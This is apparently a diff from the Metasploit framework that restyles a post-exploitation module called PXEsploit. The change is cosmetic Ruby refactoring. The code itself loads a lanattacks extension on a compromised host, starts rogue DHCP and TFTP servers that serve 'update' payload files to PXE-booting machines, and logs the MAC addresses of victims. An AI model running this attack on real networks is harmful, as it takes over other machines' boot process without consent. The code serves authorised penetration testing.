@@ -60,18 +60,16 @@ class MetasploitModule < Msf::Post
   end
 
   def run
-    if not client.lanattacks
-      print_status("Loading lanattacks extension...")
-      client.core.use("lanattacks")
-    else
-      if datastore['RESETPXE']
-        print_status("Resetting PXE attack...")
-        client.lanattacks.dhcp.reset
-      end
+    if !client.lanattacks
+      print_status('Loading lanattacks extension...')
+      client.core.use('lanattacks')
+    elsif datastore['RESETPXE']
+      print_status('Resetting PXE attack...')
+      client.lanattacks.dhcp.reset
     end
 
     # Not setting these options (using autodetect)
-    print_status("Loading DHCP options...")
+    print_status('Loading DHCP options...')
     client.lanattacks.dhcp.load_options(datastore)
 
     0.upto(4) do |i|
@@ -79,31 +77,29 @@ class MetasploitModule < Msf::Post
       contents = File.binread(::File.join(datastore['TFTPROOT'], "update#{i}"))
       client.lanattacks.tftp.add_file("update#{i}", contents)
     end
-    print_status("Starting TFTP server...")
+    print_status('Starting TFTP server...')
     client.lanattacks.tftp.start
-    print_status("Starting DHCP server...")
+    print_status('Starting DHCP server...')
     client.lanattacks.dhcp.start
-    print_status("PXEsploit attack started")
-    while (true) do
-      begin
-        # get stats every 20s
-        select(nil, nil, nil, 20)
-        client.lanattacks.dhcp.log.each do |item|
-          print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} " +
-              "(#{Rex::Socket.addr_ntoa(item[1])})")
-          report_note({
-            :type => 'PXE.client',
-            :data => item[0].unpack('H2H2H2H2H2H2').join(':')
-          })
-        end
-      rescue ::Interrupt
-        print_status("Stopping TFTP server...")
-        client.lanattacks.tftp.stop
-        print_status("Stopping DHCP server...")
-        client.lanattacks.dhcp.stop
-        print_status("PXEsploit attack stopped")
-        return
+    print_status('PXEsploit attack started')
+    loop do
+      # get stats every 20s
+      select(nil, nil, nil, 20)
+      client.lanattacks.dhcp.log.each do |item|
+        print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} " \
+            "(#{Rex::Socket.addr_ntoa(item[1])})")
+        report_note({
+          type: 'PXE.client',
+          data: item[0].unpack('H2H2H2H2H2H2').join(':')
+        })
       end
+    rescue ::Interrupt
+      print_status('Stopping TFTP server...')
+      client.lanattacks.tftp.stop
+      print_status('Stopping DHCP server...')
+      client.lanattacks.dhcp.stop
+      print_status('PXEsploit attack stopped')
+      return
     end
   end
 end
